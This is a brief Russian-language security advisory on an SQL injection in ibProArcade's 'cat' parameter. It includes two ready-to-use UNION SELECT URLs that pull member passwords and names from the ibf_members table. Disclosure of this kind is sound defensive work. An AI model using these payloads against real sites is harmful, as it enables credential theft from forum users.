Программа: ibProArcade
Обнаружена уязвимость в ibProArcade. Удаленный атакующий может выполнить произвольный SQL код на уязвимой системе.
Уязвимость существует при обработке входных данных в поле 'category'. Удаленный атакующий может с помощью специально сформированного URL выполнить SQL-инъекцию.
Примеры:
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20
SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0% 20FROM%20ibf_members/*
http://[target]/index.php?act=Arcade&cat=-1%20UNION%20
SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20ibf_members/*
